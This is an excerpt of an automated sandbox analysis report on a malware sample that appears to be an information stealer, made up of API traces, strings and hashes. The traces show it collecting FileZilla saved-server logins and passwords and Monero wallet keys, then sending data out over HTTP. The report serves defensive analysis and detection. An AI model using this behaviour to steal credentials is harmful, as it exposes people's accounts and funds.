                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L $c}o{
                        • API String ID: 0-1831283734
                        • Opcode ID: f2cbfa3b5306f86b01bf004b6427b31e31dc081fb65a0065cdb69552a27a58a6
                        • Instruction ID: ceaa8b642d37d83e14ca43f537b7228fd0723325871a9a1551f020563300c6fb
                        • Opcode Fuzzy Hash: f2cbfa3b5306f86b01bf004b6427b31e31dc081fb65a0065cdb69552a27a58a6
                        • Instruction Fuzzy Hash: 335129B7D0C115CBD704EE28DC60BBF76E6EB90310F358A3E99A397704E63889159782
                        Function 008778F4 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 771d4f2edb67c239dfc6a94aa9c460c174f2b1acb9758a01ea7c7487d48299a6
                        • Instruction ID: 71e6fdbd5a88690ba7ddc92f31edc1713a712bec1c783ad2ac275ea729fb2dfa
                        • Opcode Fuzzy Hash: 771d4f2edb67c239dfc6a94aa9c460c174f2b1acb9758a01ea7c7487d48299a6
                        • Instruction Fuzzy Hash: 1131C2F3E486008BF3046A64DC8436AB692EBC4314F1B893CCB98877C1E93D88064746
                        Function 005F9750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 005F0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00600DBA,00600DB7,00600DB6,00600DB3), ref: 005F0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 005F0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 005F03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 005F0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005F0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 005F0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 005F0571
                        • lstrcat.KERNEL32(?,url: ), ref: 005F0580
                        • lstrcat.KERNEL32(?,00000000), ref: 005F0593
                        • lstrcat.KERNEL32(?,00601678), ref: 005F05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 005F05B5
                        • lstrcat.KERNEL32(?,0060167C), ref: 005F05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 005F05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 005F05E6
                        • lstrcat.KERNEL32(?,00601688), ref: 005F05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 005F0604
                        • lstrcat.KERNEL32(?,00000000), ref: 005F0617
                        • lstrcat.KERNEL32(?,00601698), ref: 005F0626
                        • lstrcat.KERNEL32(?,0060169C), ref: 005F0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 14e9980a3b80e304380faba4cf70be44c355fa434d38e44c63ca4077d0172bdb
                        • Instruction ID: 3ad4cce6fda87c7f04b43149ad5fb44f77c804f34b9e56113006d4b5fba7119f
                        • Opcode Fuzzy Hash: 14e9980a3b80e304380faba4cf70be44c355fa434d38e44c63ca4077d0172bdb
                        • Instruction Fuzzy Hash: 27D121B191010DABDB08EBF0DD59EFE7B79BF54300F448418F606A6095DF78AA06CB62
                        Function 005E5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005E59F8
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0115E7A8,00000000,?,0115A840,00000000,?,00601A1C), ref: 005E5E71
                        • lstrlen.KERNEL32(00000000), ref: 005E5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005E5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E5E9A
                        • lstrlen.KERNEL32(00000000), ref: 005E5EAF
                        • lstrlen.KERNEL32(00000000), ref: 005E5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005E5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 005E5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005E5F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005E5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FBD
                        • HttpOpenRequestA.WININET(00000000,0115E8C8,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E5BF8
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: d3cc75001c510f1974d3d320a2e2bb36438d160218de3ff56ff22cebd28817ef
                        • Instruction ID: dc07278f709d0d80a9adba94476c7abf115ee909b61726a040e1c6cdad46f011
                        • Opcode Fuzzy Hash: d3cc75001c510f1974d3d320a2e2bb36438d160218de3ff56ff22cebd28817ef
                        • Instruction Fuzzy Hash: BA1200B182011DABDB19EBA0DC99FEE7778BF54740F404169B20A63091EF742B4ACF56
                        Function 005ECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ECF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005ED0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005ED0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED208
                        • lstrcat.KERNEL32(?,00601478), ref: 005ED217
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED22A
                        • lstrcat.KERNEL32(?,0060147C), ref: 005ED239
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED24C
                        • lstrcat.KERNEL32(?,00601480), ref: 005ED25B
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED26E
                        • lstrcat.KERNEL32(?,00601484), ref: 005ED27D
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED290
                        • lstrcat.KERNEL32(?,00601488), ref: 005ED29F
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED2B2
                        • lstrcat.KERNEL32(?,0060148C), ref: 005ED2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED2D4
                        • lstrcat.KERNEL32(?,00601490), ref: 005ED2E3
                          • Part of subcall function 005FA820: lstrlen.KERNEL32(005E4F05,?,?,005E4F05,00600DDE), ref: 005FA82B
                          • Part of subcall function 005FA820: lstrcpy.KERNEL32(00600DDE,00000000), ref: 005FA885
                        • lstrlen.KERNEL32(?), ref: 005ED32A
                        • lstrlen.KERNEL32(?), ref: 005ED339
                          • Part of subcall function 005FAA70: StrCmpCA.SHLWAPI(01158F98,005EA7A7,?,005EA7A7,01158F98), ref: 005FAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 005ED3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 958b033580ada95bc83e2e2260086e0b1e104acc31570aed2e84a6f2f9a01bdc
                        • Instruction ID: 2e5e7da1d590e3939ceca891e8550d42484d11df1cc7d9e3138173f36efe7010
                        • Opcode Fuzzy Hash: 958b033580ada95bc83e2e2260086e0b1e104acc31570aed2e84a6f2f9a01bdc
                        • Instruction Fuzzy Hash: 76E114B1910109ABCB18EBA0DD99EFE7779BF54301F104154F60BA7091DF79AA0ACB63
                        Function 005E4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005E4915
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00600DDB,00000000,?,?,00000000,?,",00000000,?,0115E8E8), ref: 005E4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005E4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005E4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005E4E49
                        • InternetCloseHandle.WININET(00000000), ref: 005E4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 005E4EC5
                        • HttpOpenRequestA.WININET(00000000,0115E8C8,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E4B15
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • InternetCloseHandle.WININET(00000000), ref: 005E4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: f379f977c26347c242beb979b3325d4cf9f9393bd45cb48e55073b5c24978bf2
                        • Instruction ID: eb9cc44b0eff0f8d45add00f2efa5cb4394cc21fa93b00db617a954b01e3547b
                        • Opcode Fuzzy Hash: f379f977c26347c242beb979b3325d4cf9f9393bd45cb48e55073b5c24978bf2
                        • Instruction Fuzzy Hash: C4120EB291011DAADB18EB50CD56FEEBB79BF54340F5041A9B20A63091EF742F49CF62
                        Function 005EC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0115D458,00000000,?,0060144C,00000000,?,?), ref: 005ECA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005ECA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005ECA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005ECAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005ECAD9
                        • StrStrA.SHLWAPI(?,0115D578,00600B52), ref: 005ECAF7
                        • StrStrA.SHLWAPI(00000000,0115D518), ref: 005ECB1E
                        • StrStrA.SHLWAPI(?,0115D920,00000000,?,00601458,00000000,?,00000000,00000000,?,01158F88,00000000,?,00601454,00000000,?), ref: 005ECCA2
                        • StrStrA.SHLWAPI(00000000,0115D780), ref: 005ECCB9
                          • Part of subcall function 005EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005EC871
                          • Part of subcall function 005EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005EC87C
                        • StrStrA.SHLWAPI(?,0115D780,00000000,?,0060145C,00000000,?,00000000,01158FA8), ref: 005ECD5A
                        • StrStrA.SHLWAPI(00000000,01159218), ref: 005ECD71
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B46), ref: 005EC943
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B47), ref: 005EC957
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B4E), ref: 005EC978
                        • lstrlen.KERNEL32(00000000), ref: 005ECE44
                        • CloseHandle.KERNEL32(00000000), ref: 005ECE9C
